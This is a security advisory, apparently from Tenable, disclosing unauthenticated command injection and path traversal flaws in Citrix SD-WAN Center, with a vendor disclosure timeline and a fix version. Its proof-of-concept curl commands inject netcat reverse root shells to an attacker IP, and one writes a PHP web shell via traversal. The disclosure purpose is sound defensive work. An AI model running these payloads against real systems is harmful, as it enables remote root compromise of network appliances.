Multiple vulnerabilities were discovered in Citrix SD-WAN Center. Note: Since the 'www-data' user has been given 'sudo' privileges, all of the vulnerabilities can be exploited to gain root access. #### /Collector/diagnostics/ping Unauthenticated Command Injection The "ping" action in DiagnosticsController is susceptible to command injection by a remote, unauthenticated attacker. Specifically, the ping function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for 'ipAddress', 'pingCount', or 'packetSize'. ##### Proof of Concept ``` ncip=192.168.1.191 ncport=4444 target=192.168.1.198 curl --insecure -d 'ipAddress=%60sudo+/bin/nc+-nv+'$ncip'+'$ncport'+-e+/bin/bash%60' https://$target/Collector/diagnostics/ping ``` #### /Collector/diagnostics/trace_route Unauthenticated Command Injection The...
Multiple vulnerabilities were discovered in Citrix SD-WAN Center. Note: Since the 'www-data' user has been given 'sudo' privileges, all of the vulnerabilities can be exploited to gain root access. #### /Collector/diagnostics/ping Unauthenticated Command Injection The "ping" action in DiagnosticsController is susceptible to command injection by a remote, unauthenticated attacker. Specifically, the ping function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for 'ipAddress', 'pingCount', or 'packetSize'. ##### Proof of Concept ``` ncip=192.168.1.191 ncport=4444 target=192.168.1.198 curl --insecure -d 'ipAddress=%60sudo+/bin/nc+-nv+'$ncip'+'$ncport'+-e+/bin/bash%60' https://$target/Collector/diagnostics/ping ``` #### /Collector/diagnostics/trace_route Unauthenticated Command Injection The "trace_route" action in DiagnosticsController is susceptible to command injection by a remote, unauthenticated attacker. Specifically, the trace_route function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for 'ipAddress'. ##### Proof of Concept ``` ncip=192.168.1.191 ncport=4444 target=192.168.1.198 curl --insecure -d 'ipAddress=%60sudo+/bin/nc+-nv+'$ncip'+'$ncport'+-e+/bin/bash%60' https://$target/Collector/diagnostics/trace_route ``` #### /Collector/storagemgmt/apply Unauthenticated Command Injection The "apply" action in StorageMgmtController is susceptible to command injection by a remote, unauthenticated attacker. Specifically, the callStoragePerl function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying an array value with crafted values for 'action', 'host', 'path', or 'type'. ##### Proof of Concept ``` ncip=192.168.1.191 ncport=4444 target=192.168.1.198 curl --insecure 'https://'$target'/Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60sudo+/bin/nc+-nv+'$ncip'+'$ncport'+-e+/bin/bash%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype' ``` #### /Collector/nms/addModifyZTDProxy Unauthenticated Command Injection The "addModifyZTDProxy" action in NmsController is susceptible to command injection by a remote, unauthenticated attacker. Specifically, the addModifyZTDProxy function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for 'ztd_password'. ##### Proof of Concept ``` ncip=192.168.1.191 ncport=4444 target=192.168.1.198 curl --insecure 'https://'$target'/Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(sudo$IFS/bin/nc$IFS-nv$IFS$(/bin/echo$IFS-e$IFS\x3'$ncip')$IFS$(/bin/echo$IFS-e$IFS\x3'$ncport')$IFS-e$IFS/bin/bash)' ``` #### /Collector/appliancesettings/applianceSettingsFileTransfer Unauthenticated Directory Traversal File Write The "applianceSettingsFileTransfer" action in ApplianceSettingsController is susceptible to directory traversal by a remote, unauthenticated attacker. Specifically, the applianceSettingsFileTransfer function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a file system path. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted values for 'filename', 'filedata', and 'workspace_id'. This vulnerability can be exploited to write files to locations writable by the 'www-data' user. Furthermore, an attacker could write a crafted PHP file to /home/talariuser/www/app/webroot/files/ to execute arbitrary PHP code. ##### Proof of Concept ``` ncip=192.168.1.191 ncport=4444 target=192.168.1.198 curl --insecure -d 'filename=../../../../../../home/talariuser/www/app/webroot/files/shell.php&filedata=' https://$target/Collector/appliancesettings/applianceSettingsFileTransfer curl --insecure https://$target/talari/app/files/shell.php ``` #### /Users/create Authenticated Command Injection The "create" action in UsersController is susceptible to command injection by a remote, authenticated attacker. Specifically, the create function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by supplying a crafted value for 'level'. Note: when $level is compared to an integer value (using ==), it is converted to 0 (int). This is why validation passes. Type checking would help here (===). ##### Proof of Concept ``` POST /Users/create HTTP/1.1 Host: 192.168.1.198 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.198/Users?rdx=true Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 149 Connection: close Cookie: urlhashcomponent=; VWCSession=15jjk7584jmn9v5na2q6gspnc3 username=scooby&level=`sudo+touch+/var/tmp/vuln_6`&password=password&confirm_password=password&secAuth=false&csrf_token=9b97e4423f0f0bdf18e089b2de3c8e78 root@SD-WANCenter:/opt/citrix/licensing/LS# ls -l /var/tmp total 0 -rw-r--r-- 1 ctxlsuser lmadmin 0 Apr 12 01:32 lockCITRIX -rw-r--r-- 1 root root 0 Apr 12 02:49 vuln_6 ``` ### Solution Upgrade to version 10.2.3. ### Disclosure Timeline 04/17/2019 - Disclosure sent to secure@citrix.com. 90 day date is July 17, 2019. 04/17/2019 - Citrix acknowledges receipt of the report and assigns an identifier of CASE-7736. 05/01/2019 - Tenable asks for update. 05/01/2019 - Citrix is unable to reproduce the bugs without authentication. Asks for clarification. 05/02/2019 - Tenable sends new PoC's in the form of curl commands to hopefully clarify the vulnerabilities. 05/03/2019 - Citrix thanks Tenable for the additional details. They will be in touch as soon as they have any new information. 05/10/2019 - Tenable follows up to see if the new PoC's aided with the reproduction. 05/10/2019 - Citrix is able to reproduce the bugs without authentication. Thanks Tenable for the additional info. They do not have a schedule for the release but will keep us informed. 05/10/2019 - Tenable thanks Citrix for the update. Reminds Citrix of 90-day policy. Also we ask if they will make the 90-day date. 05/10/2019 - Tenable asks if we need to assign the CVEs and if Citrix will be releasing a bulletin. 05/13/2019 - Citrix will handle CVE assignment. They will also ensure all fixes and a security bulletin will be available before July 17th, 2019. 05/13/2019 - Tenable thanks Citrix for the update. 06/11/2019 - Tenable notices 10.2.3 was just released. Asks Citrix if these bugs were fixed because we can't download the new version successfully. 06/12/2019 - Response from Citrix: "Citrix will publish which versions have relevant fixes when we publish our Security Bulletin with respect to your findings and these issues." Citrix also reconfirms disclosure date. 06/12/2019 - Tenable informs Citrix that we will be moving the disclosure date to Aug 21 in order to disclose more SD-WAN vulnerabilities in bulk. 06/12/2019 - Citrix acknowledges the new disclosure date. Citrix will reach out closer to the disclosure date to coordinate how to credit Tenable in the security bulletin. 06/13/2019 - Tenable acknowledges. 06/26/2019 - Citrix advises that they are planning to release a public bulletin within the next two weeks. They hope to have a more specific date in the next few days. Asks Tenable how to give credit. 06/27/2019 - Tenable acknowledges. Asks to be updated when a more specific date is decided on. Credit looks good. Asks about CVE identifiers and the patched version number. 07/02/2019 - Tenable asks for an update. 07/02/2019 - Tenable notices that version 10.2.3 patches all issues. Advisory released.
